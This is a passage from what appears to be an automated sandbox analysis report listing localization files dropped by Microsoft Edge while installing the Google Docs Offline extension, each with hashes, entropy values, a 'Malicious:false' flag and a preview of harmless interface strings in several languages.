                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\en_CA\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):851
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                                          MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                                          SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                                          SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                                          SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\en_GB\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):848
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.494568170878587
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                                                                                                                                                                                                                                                          MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                                                                                                                                                                                                          SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                                                                                                                                                                                                          SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                                                                                                                                                                                                          SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\en_US\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):1425
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.461560329690825
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                                                                                                                                                                                                                                                                                                          MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                                                                                                                                                                                                                                                                                                          SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                                                                                                                                                                                                                                                                                          SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                                                                                                                                                                                                                                                                                          SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\es\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):961
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.537633413451255
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                                                                                                                                                                                                                                                                                                          MD5:F61916A206AC0E971CDCB63B29E580E3
                                                                                                                                                                                                                                                                                                                          SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                                                                                                                                                                                                                                                                                                          SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                                                                                                                                                                                                                                                                                                          SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\es_419\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):959
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.570019855018913
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
                                                                                                                                                                                                                                                                                                                          MD5:535331F8FB98894877811B14994FEA9D
                                                                                                                                                                                                                                                                                                                          SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
                                                                                                                                                                                                                                                                                                                          SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
                                                                                                                                                                                                                                                                                                                          SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\et\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):968
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.633956349931516
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
                                                                                                                                                                                                                                                                                                                          MD5:64204786E7A7C1ED9C241F1C59B81007
                                                                                                                                                                                                                                                                                                                          SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
                                                                                                                                                                                                                                                                                                                          SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
                                                                                                                                                                                                                                                                                                                          SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\eu\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):838
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.4975520913636595
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
                                                                                                                                                                                                                                                                                                                          MD5:29A1DA4ACB4C9D04F080BB101E204E93
                                                                                                                                                                                                                                                                                                                          SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
                                                                                                                                                                                                                                                                                                                          SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
                                                                                                                                                                                                                                                                                                                          SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\fa\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):1305
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.673517697192589
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
                                                                                                                                                                                                                                                                                                                          MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
                                                                                                                                                                                                                                                                                                                          SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
                                                                                                                                                                                                                                                                                                                          SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
                                                                                                                                                                                                                                                                                                                          SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\fi\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):911
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.6294343834070935
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
                                                                                                                                                                                                                                                                                                                          MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
                                                                                                                                                                                                                                                                                                                          SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
                                                                                                                                                                                                                                                                                                                          SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
                                                                                                                                                                                                                                                                                                                          SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\fil\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):939
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.451724169062555
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
                                                                                                                                                                                                                                                                                                                          MD5:FCEA43D62605860FFF41BE26BAD80169
                                                                                                                                                                                                                                                                                                                          SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
                                                                                                                                                                                                                                                                                                                          SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
                                                                                                                                                                                                                                                                                                                          SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\fr\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):977
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.622066056638277
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
                                                                                                                                                                                                                                                                                                                          MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
                                                                                                                                                                                                                                                                                                                          SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
                                                                                                                                                                                                                                                                                                                          SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
                                                                                                                                                                                                                                                                                                                          SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\fr_CA\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):972
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.621319511196614
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
                                                                                                                                                                                                                                                                                                                          MD5:6CAC04BDCC09034981B4AB567B00C296
                                                                                                                                                                                                                                                                                                                          SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
                                                                                                                                                                                                                                                                                                                          SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
                                                                                                                                                                                                                                                                                                                          SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\gl\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):990
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.497202347098541
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
                                                                                                                                                                                                                                                                                                                          MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
                                                                                                                                                                                                                                                                                                                          SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
                                                                                                                                                                                                                                                                                                                          SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
                                                                                                                                                                                                                                                                                                                          SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\gu\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
